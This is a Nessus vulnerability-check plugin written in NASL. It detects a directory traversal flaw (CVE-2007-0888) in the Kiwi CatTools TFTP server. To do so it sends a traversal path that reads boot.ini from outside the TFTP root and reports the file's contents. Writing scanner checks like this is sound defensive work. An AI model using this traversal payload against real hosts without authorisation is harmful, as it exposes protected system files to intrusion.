#
# Script Written By Ferdy Riphagen 
# Script distributed under the GNU GPLv2 License.
#
#
# Changes by Tenable: 
#	- re-did the description
#	- raised the risk
#

  desc = "
Synopsis :

The remote TFTP server is affected by a directory traversal
vulnerability. 

Description :

The remote host appears to be running Kiwi CatTools, a freeware
application for device configuration management. 

The TFTP server included with the version of Kiwi CatTools installed
on the remote host fails to sanitize filenames of diretory traversal
sequences.  An attacker can exploit this issue to get or put arbitrary
files on the affected host subject to the privileges of the user id
under which the server operates, LOCAL SYSTEM by default. 

See also :

http://www.securityfocus.com/archive/1/459500/30/0/threaded
http://www.kiwisyslog.com/kb/idx/5/178/article/

Solution :

Upgrade to Kiwi CatTools version 3.2.9 or later. 

Risk factor :

Critical / CVSS Base Score : 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)";


if (description) {
 script_id(24747); 
 script_version("$Revision: 1.5 $");

 script_cve_id("CVE-2007-0888");
 script_bugtraq_id(22490);
 script_xref(name:"OSVDB", value:"33162");

 name["english"] = "Kiwi CatTools < 3.2.9 Directory Traversal";
 script_name(english:name["english"]);
 script_description(english:desc);
 summary["english"] = "Try to grab a file outside the tftp root";
 script_summary(english:summary["english"]);

 script_category(ACT_ATTACK);
 script_family(english:"Remote file access");
 script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");

 script_dependencies("tftpd_detect.nasl", "tftpd_backdoor.nasl");
 script_require_keys("Services/udp/tftp");
 script_exclude_keys('tftp/backdoor');	# Not wise but quicker
 exit(0);
}

include("tftp.inc");

port = get_kb_item("Services/udp/tftp");
if (!port) port = 69;
if (get_kb_item('tftp/'+port+'/backdoor')) exit(0);

get = tftp_get(port:port, path:"z//..//..//..//..//..//boot.ini");
if (isnull(get)) exit(0);
# In case the backdoor was missed by tftpd_backdoor.nasl (UDP is not reliable)
tftp_ms_backdoor(file: 'boot.ini', data: get, port: port);

if (
    ("ECHO" >< get)                || ("SET " >< get)             ||
    ("export" >< get)              || ("EXPORT" >< get)           ||
    ("mode" >< get)                || ("MODE" >< get)             || 
    ("doskey" >< get)              || ("DOSKEY" >< get)           ||
    ("[boot loader]" >< get)       || ("[fonts]" >< get)          ||
    ("[extensions]" >< get)        || ("[mci extensions]" >< get) ||
    ("[files]" >< get)             || ("[Mail]" >< get)           ||
    ("[operating systems]" >< get)
)
{
    report = string(
	desc, "\n\n", "Plugin output :\n\n",
	 "Here are the contents of the file '\\boot.ini' that Nessus\n",
          "was able to read from the remote host :\n", get);
    security_hole(port:port, protocol:"udp", data:report);
}

